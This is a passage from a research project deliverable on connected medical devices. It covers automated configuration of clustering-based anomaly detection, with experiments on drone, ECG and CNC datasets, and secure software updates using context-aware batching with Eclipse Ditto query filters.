- 1: $count \leftarrow GetSampleCount(model')$
- 2: $err \leftarrow 0$
- 3: **for all** $sample \in model'$ **do**
- 4: **if** $\neg IsSameCluster(sample, model)$ **then**
- 5: $err \leftarrow err + 1$
- 6: **end if**
- 7: **end for**
- 8: $loss \leftarrow err/count$
- 9: **return** $loss$

Algorithm 3 EvaluateAnomalyMR

Require: $model, model'$

- 1: $goodLabels \leftarrow ExcludeOutliers(models.labels)$
- 2: $count, badSamples \leftarrow GetInjectedBadSamples(model')$
- 3: $err \leftarrow 0$
- 4: **for all** $badSample \in badSamples$ **do**
- 5: **if** $badSample.label \in goodLabels$ **then**
- 6: $err \leftarrow err + 1$
- 7: **end if**
- 8: **end for**
- 9: $loss \leftarrow err/count$
- 10: **return** $loss$

count by the number of injected bad samples to calculate the loss (Line 9). The loss represents the clustering results' deviation on the follow-up model from the source model under an anomaly MR. We return the loss as output (Line 10).

In total, we use eleven MRs to evaluate configurations. We also employ two more metrics (Lines 8-13 in Algorithm 1):

- **Silhouette Score.** We incorporate the silhouette score (Lines 7-12 in Algorithm 1), i.e., an internal validation technique that assesses the effectiveness of a clustering system by measuring intercluster compactness and intracluster separation [48, 42]. Although the silhouette score has received criticism for its static approach, as it does not consider input dataset changes or the relationships between various clustering outcomes [67], we believe it could still be a valuable metric in evaluating configurations. It ranges from -1 (worst) to $+1$ (best), with values close to 0 indicating overlapping clusters and negative values indicating incorrect sample assignments. In each trial, we calculate the silhouette score of the resulting clusters. For negative scores, we penalize the model with losses equal to the absolute value of the score. For positive scores, we calculate losses as $losses \leftarrow 1 - silhouetteScore$.
- **Noise.** We assume that the training dataset contains only benign data with no anomalies and that the model should be robust against white noise or interference spikes in the data without reporting them as anomalies. We calculate the number of outliers the model produces for each trial and penalize the model for generating outliers. The loss is calculated as the ratio of the number of outliers to the total number of samples (Line 13 in Algorithm 1).

Users can assign weighted scores to each objective based on their relative importance. For instance, if the intrinsic quality of the clusters is more important than others, the silhouette score is given more weight (w_s) to calculate the loss as $losses \leftarrow w_s \times (1 - silhouetteScore)$ in Algorithm 1.

Table 3.3: Configuration domain applied in our experiments

Data preprocessing	Sliding window size $w=[30,1500]$, Overlap $d=[0,1)$ features={mean,range,gradient,variance}
Clustering method	{K-means, MiniK-means, DBScan, Optics}
Hyperparameters	
KMeans	n_clusters=[1,15]
Mini-batch KMeans	n_clusters=[1,15] max_iter={50, 100, 150} batch_size={256, 512, 1024, 2048}
DBScan & Optics	eps=[0.1,5] min_samples=[5,70] metric=['euclidean', 'l1', 'l2', 'manhattan'] algo=['auto', 'ball_tree', 'kd_tree', 'brute']

3.4.4 Initial Experimentation

We evaluate our approach on six datasets from three distinct domains to address the following Research Questions (RQ)s:

- **RQ1.** *How does clustering-based anomaly detection perform with our approach?* This RQ is central to validating and improving the ENTRUST digital twin’s capability to detect anomalies in CMDs. Since clustering forms the core of our unsupervised anomaly detection method, understanding its performance directly informs how effectively the system can identify security-relevant deviations without relying on labeled data. This evaluation helps refine both model configuration and feature selection strategies, ensuring reliable detection, and strengthens the anomaly detection module’s role as a Trust Source within the ENTRUST framework.
- **RQ2.** *Is clustering-based anomaly detection configured by our approach more effective than baseline anomaly detection approaches?* This RQ is crucial for assessing the added value of our automated configuration method within the ENTRUST framework. By comparing the performance of automatically configured clustering models against baseline setups, we can determine whether our approach improves detection accuracy, reduces false positives, and enhances adaptability in CMD environments. Demonstrating such improvements validates the relevance of automated configuration for ensuring optimal, trust-enabling anomaly detection without relying on manual tuning.
- **RQ3.** *How does Bayesian optimization boost the efficiency of the search process in our approach?* This RQ is relevant for understanding the practicality and scalability of our automated configuration method within ENTRUST. Since manually tuning clustering parameters is time-consuming and inefficient, especially in dynamic CMD environments, assessing how Bayesian optimization accelerates the search for optimal configurations helps demonstrate the method’s effectiveness in reducing configuration time while maintaining or improving anomaly detection performance. This directly supports the goal of enabling adaptive, low-overhead trust assessment in real-world deployments.

3.4.4.1 Experiment Design

Configuration domain. Table 3.3 shows the configuration search space in our experiments.

Datasets. Our evaluation used six datasets, including simulated and actual time-series log data from three domains: Drones, Electrocardiogram (ECG) machine, and Computer Numerical Control (CNC)

Table 3.4: Statistics of the datasets. Training dataset (Column '#Train') contains no known anomaly. Test dataset (Column '#Test') contains a mix of normal samples and real/injected faulty samples.

Dataset	CPS	Anomaly	#Train	#Test
DJI-Windy	Drone	Extreme wind	10,016	20,000
DJI-VelFault	Drone	Faulty Sensor	5,000	2,000
PX4-Vibrate	Drone	Anomalous vibrations	43,547	10,887
Ardu-GyroFault	Drone	Faulty Sensor	144,176	2,000
Sleep-Apnea	ECG	Sleep Apnea	50,000	5,000
Bosch-CNC	CNC	Anomalous vibrations	59,393	99,400

machine. The datasets consist of four simulated Drone datasets, acquired from various drone control programs (DJI, Ardupilot, and PX4), and two real ECG and CNC datasets (Sleep-Apnea and Bosch-CNC). Table 3.4 lists the dataset statistics. All datasets contain real or realistic anomalies. The Sleep-Apnea dataset represents actual ECG measurement data of the sleep-apnea condition of a patient, while Bosch-CNC contains real sensor data from the Bosch CNC machine.

DJI-Windy includes drone log data under harsh weather conditions, causing the pilot to abort the mission. The anomaly was motivated by a real-world accident caused by wind gusts making the drone descend at the wrong angle [60]. We simulated the wind using the DJI simulator and collected acceleration data from the DJI Matrice 300 [20] during a mission without anomalies (train dataset) and under strong wind halfway through the mission (test dataset).

Ardu-GyroFault and *DJI-VelFault* simulate faulty sensors, Gyroscopic and Velocity, respectively (motivated by Son et al. [62]). We injected sensor failures to simulate cases with abnormal sensor readings (very low or high). We used the Ardupilot simulator [1] for *Ardu-GyroFault* and the DJI simulator for *DJI-VelFault* to conduct the standard flight mission AVC2013 [65]. In the test dataset, the “Gyroscopic Y-axis” and “Velocity Y-axis” are set to abnormally high values.

PX4-Vibrate simulates a flight for a PX4-powered drone. The fault was injected into acceleration Z-and Y axes for the heavy vibration drone behavior.

Sleep-Apnea is obtained from a sleep heart health study [61] (determining *sleep apnea* based on the patient’s breathing behavior) with 6000 patients. We randomly selected one of the patient’s records, which contains measurements of nasal/oral airflow (thoracic respiratory) and the sleep apnea condition (dependent variable). According to their report, apneas start if the nasal/oral airflow amplitude decreases below approximately 25% of the baseline identified during regular breathing with stable oxygen levels for more than 10 seconds.

Bosch-CNC contains vibration behavior captured from three different CNC milling machines executing 15 processes [66], including normal and anomalous conditions (see Figure 3.14(a)). Tri-axial accelerometers were mounted in each machine, measuring acceleration in X, Y, and Z-axes at a sampling rate of 2 kHz. For the training set, we selected a sequence with no anomalies, while for the test set, we chose a data sequence containing both normal and anomalous data.

Setup. We implemented our configuration approach using Python 3, Scikit-Learn libraries [53], and HyperOpt [8]. The experiments were done on a Linux machine with 40 cores Intel CPU E5-2640 2.40GHz and 330GB RAM. For each training dataset, we ran 10,000 trials to find the optimal configuration. Depending on the dataset size, the time to complete the trials ranges from one to seven days. After finding the optimal configuration, the clustering model is built and is used to validate the test data (see Figure 3.11 and Step 3 in Section 3.4.2).

Figure 3.12: (a) Timeseries reference data of DJI-Windy dataset; (b) Clustering using the best configuration found by our approach; (c) Clustering using default configuration.

3.4.4.2 Results

This section discusses the results of our case studies, addressing, in turn, each of the RQs.

RQ1: How does unsupervised learning systems perform with our approach?

To address RQ1, we compared the anomaly detection results of the configurations produced by our approach and a baseline method utilizing an internal validity metric, since current approaches [22, 54, 12] use such metrics (e.g., silhouette score, Calinski-Harabasz score, and Davies-Bouldin score [48]) to optimize clustering systems. Initially, we performed a preliminary experiment on a sample dataset to assess these metrics and identified the silhouette score as the best-performing one. We thus chose it for the baseline approach in our evaluation. The baseline approach is simply our approach using only the silhouette score (*Silhouette-Only-Approach*). Therefore, we also implicitly assessed to what extent metamorphic testing improves the configuration search.

Table 3.6 shows the anomaly detection results of our approach and the *Silhouette-Only-Approach* baseline using the internal validity metric. Our approach consistently outperformed *Silhouette-Only-Approach*. The F1-score is above 0.7 for all datasets, indicating that our approach is generally effective in finding the best configurations for anomaly detection. The configurations provided by our approach achieved high recall and precision, particularly for DJI-VelFault, PX4-Vibrate, and Ardu-GyroFault having distinct anomalies, such as constantly high sensor values for a prolonged period.

Table 3.5 lists the configurations delivered by our approach for the datasets (w is the window size, and d is the overlap). Different datasets require unique configurations. An anomaly detection model built from the “best” configuration should ideally represent the reference training data well and detect anomalies more effectively than models that utilize default hyperparameters. Figure 3.12 presents the DJI-Windy time-series training dataset, its clustering of principal components (pca) with the “best” configuration, and its clustering with default DBScan hyperparameter values from the Scikit-learn library. Each color represents a cluster. The best model correctly captured roughly seven patterns in the training data with seven clusters (excluding the outlier cluster), while the default model produced four clusters. The default model had an F1 score of 0.55 whereas the best model had an F1 score of 0.71 (Table 3.6).

The hyperparameter w (window) in Table 3.5 depends on the data sampling rate and the duration of the behavior we want to capture. For example, the Sleep-Apnea dataset requires a large window size (250) to capture the breathing patterns, which last several seconds. In contrast, the drone log data, which has a sample rate in milliseconds, requires a smaller window size.

The performance of the configuration produced by our approach is slightly lower for the DJI-Windy dataset due to inconsistencies in the test data, which can lead to confusion in the anomaly detection model. Figure 3.13(a) presents the acceleration sensor values in the training and test data. During some periods in the test data, the flight direction of the drone aligns with the wind direction, resulting in low acceleration

Table 3.5: Best Configurations found by our approach.

Dataset	w	d	Model	Model Params	Min. Loss
DJI-Windy	42	28	DBScan	eps=0.3 min_samples=19 metric=l1 algo=brute	0.052
DJI-VelFault	48	30	KMeans	n_clusters=3	0.067
PX4-Vibrate	49	40	DBScan	eps=4.77 min_samples=13 metric=l2 algo=brute	0.278
Ardu-GyroFault	47	27	DBScan	eps=2.88 min_samples=20 metric=euclidean algo=brute	0.283
Sleep-Apnea	250	10	DBScan	eps=1.35 min_samples=15 metric=euclidean algo=auto	0.042
Bosch-CNC	1100	330	DBScan	eps=0.53 min_samples=6 metric=euclidean algo=auto	0.107

Table 3.6: Comparison of our approach and baseline approaches

Dataset	Our approach			<i>Silhouette-Only-Approach</i>			<i>OneSVM</i>	<i>IF</i>	<i>LOF</i>
	Recall	Precision	F1-score	Recall	Precision	F1-score	F1-score	F1-score	F1-score
DJI-Windy	0.76	0.66	0.71	0.18	0.43	0.26	0.51	0.65	0.49
DJI-VelFault	1	1	1	1	1	1	1	1	1
PX4-Vibrate	1	0.92	0.96	1	0.87	0.93	0.64	0.64	0.4
Ardu-GyroFault	1	0.9	0.95	1	0.87	0.93	0.93	0.9	0.9
Bosch-CNC	0.76	0.72	0.74	0.5	0.66	0.57	0.56	0.55	0.49
Sleep-Apnea	0.84	0.85	0.85	1	0.65	0.78	0.39	0.39	0.39

values that are similar to those in the training data. However, the training data contains high acceleration data for a certain duration, indicating a strong-wind situation (the wind condition was to match the current weather as closely as possible). These situations can result in false alarms and false negatives (see Figure 3.13(a) for the actual labels and the labels predicted with our approach), affecting recall and precision.

Figure 3.14(a) displays a time series of the Bosch-CNC training and test datasets, while Figure 3.14(b) depicts the actual and predicted labels (with our approach) for the same dataset. The anomalous data in the test dataset has larger amplitudes than the normal data in the training dataset, aiding in distinguishing the two types of behavior. However, statistical properties such as the mean and range of the values show similar characteristics in certain portions of both the anomalous and normal data, which could be the reason for the relatively low performance of our approach on the Bosch-CNC dataset.

RQ2: Is clustering-based anomaly detection configured by our approach more effective than baseline anomaly detection approaches?

To address RQ2, we performed a comparison between the anomaly detection outcomes derived from the clustering-based approach that was configured by our approach and the corresponding results produced by three baseline anomaly detection techniques, i.e., One-Class SVM (OneSVM), Isolation Forest (IF),

Figure 3.13: (a) Time series plot of DJI-Windy train and test dataset. (b) Comparison of actual labels vs predicted labels.

and Local Outlier Factors (LOF) [36]. Our aim was to assess if our approach is capable of discovering configurations that lead to superior anomaly detection than the competing anomaly detection techniques.

The last three columns in Table 3.6 list the F1 scores of the three baseline approaches. The configurations our approach obtains outperform these approaches except for DJI-VelFault and Ardu-GyroFault datasets. Overall the baseline approaches failed to achieve high accuracy, whereas the configurations our approach obtain attain above an F1-score of 0.7 for all the datasets.

RQ3: How does Bayesian optimization boost the efficiency of the search process in our approach?

To address RQ3, we conducted a comparative analysis of the hyperparameter selection and exploration strategies of two versions of our approach - one using the TPE algorithm and the other using random search. The results of our analysis were consistent across all six datasets; therefore, we present the outcomes solely for the DJI-Windy dataset. Figure 3.15(a) and (b) present the scatter plots of the hyperparameter values (eps and $min_samples$) selected by our approach using the TPE algorithm for each experiment trial. TPE initially selects values from the entire range with equal probability. As it gains more knowledge about the impact of the hyperparameter on the objective function, it gradually concentrates on areas it anticipates the highest benefit. It still explores the whole solution space, but less frequently. Figure 3.15(c) shows the scatter plot of loss vs. trial, with the search space concentrated around the minimum loss of 0.05.

Figure 3.16(a) and (b) present the scatter plot of hyperparameter values (eps and $min_samples$) selected by random search, which randomly explores the entire solution space without focusing on any particular area. Consequently, the resulting loss values are not concentrated at the lower end (see Figure 3.16).

Our approach aims to find the optimal configuration, which does not necessarily converge to zero loss due to trade-offs between different loss functions. For example, while the silhouette score loss prioritizes

Figure 3.14: (a) Time series plot of Bosch-CNC train and test dataset. (b) Comparison of actual labels vs predicted labels.

compact clusters, the *noise* loss focuses on the inclusion of white noises or spikes in the clusters, which may degrade their compactness. Our approach seeks the best possible loss value by considering all relevant loss functions.

3.5 Data Types

Table 3.7 summarizes the types of telemetry and monitoring data utilized by the ENTRUST AI-based anomaly detection method, distinguishing between the data currently supported and the data planned to be included in the final version of the system.

Currently Supported Data Types: The current system supports a range of fundamental system-level metrics that are typically available in most connected medical devices and emulation environments. These include:

- CPU Usage
- Memory Usage
- Temperature
- Disk I/O
- Network Traffic
- System Load

Figure 3.15: Bayesian Optimization search: (a) eps vs trial (b) min_samples vs trial (c) loss vs trial

Figure 3.16: Random search: (a) eps vs trial (b) min_samples vs trial (c) loss vs trial

- Power Consumption

These metrics are crucial for establishing the baseline system behavior and for detecting coarse-grained anomalies in resource utilization.

Planned Enhancements for Final Version: In the final version of the system, the approach is planned to be extended to incorporate some more monitoring data that enhances the granularity and semantic richness of the analysis:

- **Control Flow Integrity (CFI):** Currently unsupported, CFI monitoring will be added to detect anomalies, which are often indicative of advanced persistent threats or memory-based attacks.
- **Process Execution:** Will be added to monitor the lifecycle and behavior of processes running on the device, which is essential for detecting execution anomalies, unauthorized process invocation, or runtime deviations.

Table 3.7: Types of Data Supported in Current and Final Versions

Data Type	Currently Supported	Planned for Final Version
CPU Usage	✓	✓
Memory Usage	✓	✓
Temperature	✓	✓
Disk I/O	✓	✓
Network Traffic	✓	✓
System Load	✓	✓
Process Execution	×	✓
Control Flow Integrity	×	✓
Power Consumption	✓	✓

3.6 Next Actions and Roadmap

With the foundational components of our solution now in place (including the attack simulation and hardware emulation environment, the AI-based anomaly detection method leveraging unsupervised learning, and the automated configuration approach for optimizing detection parameters), we are positioned to transition into the final evaluation phase of the project. Thus far, each of these techniques has been assessed individually through initial benchmarking studies, validating their technical soundness and practical potential.

In the remaining phase of the project, the focus will shift toward the integrated assessment of the complete workflow. This includes combining attack simulation, anomaly trace generation, and automated anomaly detection tuning into a unified pipeline. This end-to-end evaluation will be conducted using real-world pilots provided by ENTRUST’s industry partners, enabling us to validate the full approach in operational contexts representative of CMD environments.

Key upcoming actions include: (i) refining and validating the integration between emulation-based trace generation and the anomaly detection pipeline, (ii) adapting the automated configuration framework to dynamic conditions observed in pilot settings, and (iii) benchmarking the complete system using domain-relevant performance metrics (e.g., detection accuracy, latency, robustness, and scalability). This phase will culminate in a comprehensive analysis of the solution’s effectiveness in real-world CMD deployments, ultimately contributing to a resilient and adaptive framework within ENTRUST.

Chapter 4

Secure Software Updates

In the rapidly evolving domain of Connected Medical Device (CMD)s, the security, integrity, and maintainability of software are foundational to both patient safety and healthcare service continuity. CMDs include a wide range of interconnected technologies – from wearable ECG monitors and telemedicine gateways to diagnostic imaging systems and mobile vital sign recorders. These devices increasingly rely on complex software stacks to perform critical clinical functions, support decision-making, and exchange sensitive patient data with hospital infrastructures and cloud-based analytics platforms.

Given the potential consequences of software malfunction, outdated firmware, or unpatched vulnerabilities, maintaining the trustworthiness of a CMD is not only a matter of system stability but a regulatory and ethical imperative. A single exploited vulnerability could result in data breaches, incorrect treatment, or disruption of life-critical services. **SSUs, therefore, are a cornerstone of cyber-resilience and clinical safety.** They provide the necessary mechanisms to **respond to newly discovered vulnerabilities, apply corrective patches, enhance functional capabilities, and maintain compliance with safety regulations** such as the General Data Protection Regulation (GDPR) [34] and the European Medical Device Regulation [35].

The ENTRUST project addresses these challenges by adopting a lifecycle-based view of device security, aligning its SSU mechanisms with international best practices such as the Trusted Computing Group's (TCG) *Guidance for Secure Update of Software and Firmware on Embedded Systems* [45]. Unlike generic update frameworks, this guidance specifically considers the requirements of embedded and critical systems – precisely the class of devices targeted by ENTRUST. Key dimensions of the implemented SSU engine include: (i) verification of the **provenance and integrity** of update artefacts, (ii) **robust distribution strategies** that ensure authenticity and availability, (iii) **secure installation with runtime verification** of the software stack, and (iv) **post-installation validation** through attestation and monitoring.

Considering all the above, this chapter extends the work presented in Deliverable D3.2 [25], where the initial design and integration of the SSU engine within the ENTRUST architecture were introduced. In this deliverable, we report on key enhancements made to the SSU engine along two main directions. (i) First, **we improve scalability through batching and parallel execution, enabling efficient update management across large fleets of devices.** (ii) Second, **we introduce hierarchical update delivery, allowing high-end devices to act as proxies and relay software updates to low-end, indirectly connected devices.** Together, these enhancements increase the flexibility, performance, and applicability of the SSU engine in real-world healthcare deployments.

4.0.1 Positioning Within the Overall ENTRUST Architecture

Within ENTRUST, the SSU engine is tightly integrated into the broader trust management framework, functioning as a key reactive mechanism to changes in the trust state of a CMD. The vision of ENTRUST is to enable a secure-by-design ecosystem for connected healthcare technologies, where trust in a device is continuously assessed, and remedial actions, such as software updates, are taken as needed to restore or maintain acceptable levels of trustworthiness.

The SSU process is triggered primarily when a device's Actual Trust Level (ATL) falls below its Required Trust Level (RTL), as computed by the Trust Assessment Framework (TAF). Such trust degradation may stem from failed attestation tasks, outdated configurations, or the detection of anomalies through continuous monitoring. In this case, detailed runtime traces are passed to the DT-based simulation environment, which analyses the possible attack path or misbehaviour. Based on this analysis, the Software Verification component may generate a patched version of the software, ready to be distributed.

The SSU engine acts upon this result, orchestrating the secure rollout of the new update across the affected fleet. The process begins with a contextual selection of target devices using Resource Query Language (RQL) queries over the DT platform. The update is then assigned, dispatched, installed, and monitored across potentially diverse devices and network conditions. Statuses and anomalies are reported back to the central platform, where the post-installation state is validated to ensure that the device returns to a trustworthy operational state.

In this way, the SSU engine connects multiple components of the ENTRUST pipeline – i.e, risk detection, policy enforcement, software validation, and runtime monitoring – into a coherent and secure end-to-end flow. Its primary input is a trust degradation event or a scheduled update request, and its output is a securely updated device whose new state is verified and trusted. This capability underpins the ENTRUST objective of enabling dynamic, autonomous, and verifiable lifecycle management of connected medical devices.

4.1 Summary of the SSU Architecture from Previous Deliverable

This section provides a summary of the SSU architecture as presented in the previous deliverables. The purpose of this summary is to offer a concise summary of the key architectural elements and concepts before explaining the more recent enhancements and updates introduced to the SSU functionality. For more details about the overall architecture, its individual elements and involved stakeholders, as well as the role of the SSU process in the overall ENTRUST ecosystem we refer the reader to the following deliverables:

1. D2.1 and D2.2: ENTRUST Reference Architecture – Initial and Final Releases [23, 30].
2. D3.1: Trust Abstractions and Cryptographic Anchors for CMD Secure Operation [24].
3. D3.2: ENTRUST Risk Assessment & Collective Threat Intelligence Framework – Initial Release [25].
4. D6.1: Integrated Framework (First Release) and Use Case Analysis [28].

4.1.1 Key Stakeholders and Roles

The SSU mechanism in ENTRUST ensures timely, secure, and context-aware deployment of software and firmware updates across a fleet of CMDs. Its architecture is aligned with the overall INTEND reference architecture (reported in D2.1 and D2.2) and is built upon several core roles and components:

- **Device Manufacturer** is responsible for producing and digitally signing the firmware/software for each CMD model. These signatures enable devices (especially high-end devices equipped with cryptographic capabilities) to authenticate updates using embedded public keys.
- **System Administrator** oversees the update process. With expertise in the medical domain, they use the DT platform to assess threats and may manually trigger updates in response to emerging vulnerabilities or attacks.
- **ENTRUST Ecosystem Components** (e.g., Risk Assessment and Trust Management) may trigger updates automatically due to changes in a device's trust state. For instance, a failed attestation or results from a DT-based attack simulation may initiate the update process. Triggering mechanisms include HTTP APIs and MQTT listeners, although the final update decision involves human oversight via the System Administrator.

4.1.2 Key Functional Elements

The SSU architecture integrates several functional components to coordinate and enforce SSUs:

- **DT Platform** provides a continuously updated virtual representation of each CMD. It maintains runtime information, exposes HTTP/MQTT interfaces, and supports automatic or manual update triggering.
- **Assignment Engine** computes context-aware software assignments. It matches CMDs to appropriate software versions based on device-specific characteristics and contextual data (e.g., location, usage, environment).
- **Subfleet Manager** runs on the domain manager and mediates communication between the DT platform and local CMDs. It distributes update instructions downstream through device-specific **Adapters**.
- **Software Repository** acts as a secure distribution hub for software images. It may be a private or public (e.g., Docker Hub) repository protected via HTTPS and access control mechanisms.
- **Adapters** translate general update commands into device- or platform-specific actions, ensuring compatibility across heterogeneous CMDs.
- **Devices** include both high-end and low-end CMDs. High-end devices perform update verification directly, while low-end devices rely on proxy high-end nodes to handle complex operations. In the ENTRUST context, this could be KARDINERO's low-level KARDINBLU sensor connected to Tellu's personal healthcare gateway.
- **Tracers** collect runtime contextual information (e.g., software version, device status), which is fed into the DT platform to keep the reported state up to date.

4.1.3 Software Update Triggering and Synchronisation

The SSU architecture employs the **desired-reported property pattern**, wherein each device's DT maintains two distinct state properties:

- **Desired Properties** represent the target configuration (e.g., the intended software version).
- **Reported Properties** reflect the actual runtime state, including current software versions and trust indicators.

Discrepancies between desired and reported states signal the need for update actions. When a mismatch is detected, the update process is triggered to restore compliance with the desired state.

4.1.4 Context-Aware Assignment Strategies

The Assignment Engine leverages rich, multi-dimensional context derived from the DTs to support targeted update strategies:

- **One-to-One:** Tailored updates to a single CMD, often initiated by device-specific vulnerability detection or CIV failure.
- **One-to-Many:** Batch updates to a group of similar CMDs (e.g., same department or model), informed by shared contextual attributes and Swarm Attestation results.
- **One-to-All:** Fleet-wide updates for critical security patches or regulatory compliance, where context is still validated to ensure device compatibility.

4.2 Updated Architecture (Implementation Path Report)

The previous section summarised the SSU architectural design as it was described in the previous deliverable. The architecture emphasises secure, verifiable, and context-aware update mechanisms based on trusted computing principles and DT integration.

As identified by the ENTRUST use cases, CMDs operate in high-stakes environments where patient safety, data integrity, and continuous availability are paramount. As such, software updates must be delivered not only securely but also efficiently and with minimal disruption. The two enhancements introduced in the SSU engine – namely, scalable update delivery via contextual grouping and batching, and hierarchical propagation through proxy devices – are vital in achieving this. Together, they enable the update system to scale horizontally across large fleets and vertically across device hierarchies. This ensures that all CMDs, regardless of network visibility or computational capability, remain up-to-date and trustworthy. These mechanisms are particularly relevant in hybrid healthcare deployments where resource-rich and resource-constrained devices coexist, often across geographically distributed or dynamically changing infrastructures. In such contexts, the proposed features provide the necessary flexibility and robustness to meet the demands of modern, secure, and adaptive medical IoT systems.

In the remainder of this deliverable, we focus on these two new enhancements to the original SSU Engine architecture.

4.2.1 Scalability through Batching and Parallel Execution

As the ENTRUST project targets large-scale deployment environments with hundreds of CMDs, such as those operated by Tellu in remote healthcare monitoring or Polaris in mobile patient transport systems, the ability to scale software updates becomes a core requirement. In these settings, CMDs often share contextual characteristics, such as device model, physical location, network topology, or usage patterns, which can be leveraged to organise them into batches. For example, multiple gateways deployed within a single hospital ward, or a fleet of similar wearable health monitors connected over BLE, can be grouped for simultaneous updates. Without contextual batching, triggering updates individually would result in inefficient, sequential execution, excessive network load, and potential downtime – often an unacceptable price in the healthcare context. By adopting a batch-based approach with parallel execution, the SSU engine can reduce latency, balance load, and ensure reliable software delivery while maintaining trust and policy compliance across diverse operational domains.

In this context, scalability is a fundamental requirement for any system that aims to support large-scale, heterogeneous deployments. The ability to reliably and efficiently distribute SSUs across hundreds or even thousands of devices, each with different capabilities, connectivity conditions, and trust states, is critical for the operational resilience of ENTRUST's CMD ecosystem.

Decades of research in distributed systems and high-performance computing [19, 64, 43] have shown that optimising computational workloads often requires parallelisation and batching, two best practices that significantly improve throughput and responsiveness under load. In our work, these principles have been applied to the secure software update process to ensure that the SSU engine can handle bursts of update events without overwhelming the network or the backend infrastructure.

In scenarios where a large number of devices require software updates simultaneously (e.g., after a widespread vulnerability disclosure or policy-driven trust degradation) it is neither practical nor efficient to update all devices sequentially. To address this, we implemented a batching strategy in which devices are grouped based on configurable contextual properties, such as for example:

1. Device model or hardware architecture (e.g., ARM Cortex-A53)
2. Physical or network location (e.g., devices in the same hospital wing or subnet)
3. Supported communication protocols or interfaces (e.g., USB, Bluetooth, Ethernet)

These groupings are then used to define update batches, which are processed in parallel by the SSU backend. Each batch executes its update logic independently, allowing for load balancing and congestion avoidance in both the device network and the backend infrastructure. The grouping criteria are flexible and can be dynamically adapted to context-specific deployment needs or administrative policies.

This approach gives administrators fine-grained control over how updates are propagated, ensuring that resource-constrained or mission-critical environments are not overloaded. Furthermore, the system can be tuned to apply adaptive throttling, delaying or deferring updates for specific batches in response to real-time load or policy constraints.

4.2.1.1 Implementation Rationale and Comparison with the State of the Art and Practice

While contemporary technologies such as Docker Swarm,¹ Kubernetes,² or other cloud-native orchestration frameworks can provide similar, and often more efficient, levels of parallelism through horizontal

¹<https://docs.docker.com/engine/swarm/>

²<https://kubernetes.io/>

scaling and service replication, our design intentionally maintains control of the parallelism at the application level. This design choice is both deliberate and scientifically motivated. By embedding the parallelisation logic within the SSU system itself, we gain the ability to:

1. **Respect device-level context when defining update sequences.** For example, this approach allows us to avoid updating all gateways within a subnet or facility simultaneously, which could otherwise overload local infrastructure or interrupt critical services. More importantly, we can explicitly exclude gateways currently deployed in sensitive environments, such as intensive care units or operating rooms, where uninterrupted availability is paramount.
2. **Integrate trust-based prioritisation into the batch scheduling logic.** Not all software updates carry the same urgency or security implications. By leveraging contextual trust scores computed by the TMB, the SSU engine can prioritise critical security patches for devices exhibiting degraded trustworthiness – e.g., those flagged after failed attestations or outdated configurations. Routine or feature-based updates, on the other hand, can be scheduled with lower priority, ensuring that limited bandwidth and processing resources are allocated first to the most security-relevant updates.
3. **Maintain end-to-end semantic awareness of the update process across different CMD categories.** By preserving context throughout the update lifecycle – from target selection, to batching, to final installation – the SSU engine can make decisions that are both operationally efficient and semantically meaningful.

This also makes the approach portable to resource-constrained edge environments where container orchestration platforms might not be feasible due to overhead or infrastructure limitations.

Nevertheless, our implementation is complementary to enterprise-scale orchestration tools. The SSU engine can be deployed within such environments to benefit from orchestration-level performance optimisations, while still retaining its application-level intelligence for grouping and prioritising devices.

From a scientific standpoint, our work is inspired by decades of research in distributed systems and high-performance computing, where batching and parallel execution are well-established best practices for maximising throughput and responsiveness under load [19, 64]. However, to the best of our knowledge, these techniques have rarely been integrated into SSU workflows with device-level contextual awareness and fine-grained semantic grouping.

The novelty of our approach lies in how we reinterpret classical parallel execution patterns within a DT-driven framework for SSUs. Rather than abstracting devices into undifferentiated containers or virtual machines, our system leverages structured DT metadata to dynamically form semantically coherent subgroups of devices. Examples of contextual grouping include clustering devices by deployment location (e.g., all gateways in Hospital Ward A), by hardware characteristics (e.g., Raspberry Pi 4-based gateways), by network interface (e.g., Bluetooth-connected devices), or by operational status (e.g., devices currently in standby mode or outside of critical care zones). These are then updated concurrently through coordinated adapters, allowing both scalability and adherence to domain-specific constraints.

This architecture enables a flexible interplay between logical policies and physical execution strategies. For example, trust scores or mission-critical attributes of a CMD can influence not only if and when it is updated, but also whether it leads or follows other devices in its batch. Such awareness is typically lost in low-level orchestration, but becomes feasible when the update system itself retains full control of dependency management and execution order.

4.2.1.2 Implementation details: Context-Aware Batching and Parallel Execution in Eclipse Ditto

As previously described, to support large-scale deployments and reduce latency during the software update process in mission-critical healthcare systems, we extended the SSU functionality with a batching and parallel execution mechanism. This feature builds on Eclipse Ditto's digital twin infrastructure to enable intelligent grouping of devices and concurrent rollout of software updates.

In the original architecture, software updates were issued sequentially across the entire subset of devices regardless of its actual size. While suitable for testing or small-scale use, this approach became inefficient and prone to bottlenecks in scenarios involving tens and hundreds of devices. Updates were queued and dispatched one by one, resulting in long total update durations and uneven resource utilisation.

To overcome this limitation, we introduced a context-aware batching strategy. Using Eclipse Ditto's powerful querying capabilities, we identify and group devices that share common contextual characteristics, such as device model, hardware architecture, network location, or operational state. These groupings are expressed through RQL filters applied to the DTs. The result is a set of discrete batches, each of which represents a logical sub-fleet that can be targeted with identical update artefacts. Below are three simplified, yet representative, examples that illustrate how this mechanism is applied in practice.

Example 1: Grouping by Device Model This query selects all personal healthcare gateways built on specific of CPU architecture (e.g., ARMv7), which may require a model-specific software patch.

```
?filter=attributes/architecture eq "ARMv7"
```

Explanation: This targets all DTs where the architecture attribute has value "ARMv7". Such grouping is useful when updates are only applicable to a specific hardware or software platform.

Example 2: Grouping by Physical or Network Location This query selects all devices located in Norway, such as a hospital wing or a factory segment.

```
?filter=features/physical/properties/country eq "Norway"
```

Explanation: Devices in the same physical or logical network zone may need to be updated together (or staggered) to preserve local continuity or avoid service disruption. This type of grouping also allows network-aware rollout policies (e.g., avoid updating all devices in a subnet simultaneously).

Example 3: Grouping by Communication Interface This query targets devices that support Bluetooth as their primary communication interface.

```
?filter=features/cyber/properties/interface eq "bluetooth"
```

Explanation: Devices with similar connectivity profiles (e.g., Bluetooth, Wi-Fi, Ethernet) may have shared limitations in update speed, energy usage, or security capabilities. In ENTRUST, for example, this could be KardinBLU sensors. Grouping by interface allows update strategies tailored to the available bandwidth and reliability of the communication channel.

Once batches are defined, the SSU Engine instantiates dedicated update adapters for each group. Each adapter is responsible for handling its assigned batch and is capable of executing multiple update processes in parallel. Internally, these adapters leverage lightweight parallel execution frameworks (e.g., NodeJS's Cluster³ library) to initiate, monitor, and validate concurrent software installations across their

³<https://nodejs.org/api/cluster.html>

